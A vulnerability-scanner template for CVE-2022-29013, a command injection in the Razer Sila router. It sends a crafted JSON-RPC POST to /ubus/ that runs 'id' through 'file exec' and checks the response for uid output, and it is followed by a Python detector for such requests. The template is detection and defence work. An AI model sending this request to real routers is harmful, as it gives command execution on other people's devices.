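Vulnerability description
A command injection in the command parameter of Razer Sila router v2.0.441_api-2.0.418 allows attackers to execute arbitrary commands via a crafted POST request.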
id: CVE-2022-29013
info:
  name: Razer Sila - 命令注入
  author: Kevin Randall
  severity: high
  description: Razer Sila 路由器 v2.0.441_api-2.0.418 命令参数中的命令注入允许攻击者通过精心设计的 POST 请求执行任意命令。
  reference:
    - https://packetstormsecurity.com/files/166684/Razer-Sila-2.0.418-Command-Injection.html
    - https://www.exploit-db.com/exploits/50865
    - https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
set:
  hosturl: request.url
rules:
  r0:
    request:
      method: POST
      path: /ubus/
      headers:
        Origin: "{{hosturl}}"
        Referer: "{{hosturl}}"
        X-Requested-With: XMLHttpRequest
      body: |
        {"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"id"}]}
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0()
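
A defender-side check for the request shape this template sends, added here as an example (it is not part of the original template): it flags POSTs to /ubus/ whose JSON-RPC call targets the file object's exec function and reports the requested command. The (method, path, body) record layout, the function names and the sample requests are constructed assumptions.

```python
import json

# Constructed sample records (method, path, body), as a reverse proxy or
# packet capture might yield them; "<session>" is a placeholder value.
SAMPLE_REQUESTS = [
    ("POST", "/ubus/", '{"jsonrpc":"2.0","id":3,"method":"call","params":["<session>","file","exec",{"command":"id"}]}'),
    ("POST", "/ubus/", '{"jsonrpc":"2.0","id":1,"method":"call","params":["<session>","system","board",{}]}'),
    ("POST", "/ubus/", '[{"jsonrpc":"2.0","id":7,"method":"call","params":["<session>","file","exec",{"command":"uname"}]}]'),
    ("GET", "/index.html", ""),
    ("POST", "/ubus/", "not json"),
]


def find_ubus_exec(method, path, body):
    """Return the commands requested via ubus file/exec in one HTTP request."""
    if method.upper() != "POST" or path.rstrip("/") != "/ubus":
        return []
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return []  # malformed body: nothing to inspect
    # JSON-RPC 2.0 allows a single object or a batch (list of objects).
    calls = doc if isinstance(doc, list) else [doc]
    hits = []
    for call in calls:
        if not isinstance(call, dict) or call.get("method") != "call":
            continue
        params = call.get("params")
        # Layout seen in the template: [session, object, function, args]
        if not isinstance(params, list) or len(params) < 4:
            continue
        _session, obj, func, args = params[:4]
        if obj == "file" and func == "exec":
            cmd = args.get("command") if isinstance(args, dict) else None
            hits.append(str(cmd))
    return hits


def scan(requests):
    """Return (record_index, command) for every file/exec call found."""
    return [(i, cmd) for i, r in enumerate(requests) for cmd in find_ubus_exec(*r)]


if __name__ == "__main__":
    for idx, cmd in scan(SAMPLE_REQUESTS):
        print(f"record {idx}: ubus file/exec command={cmd!r}")
```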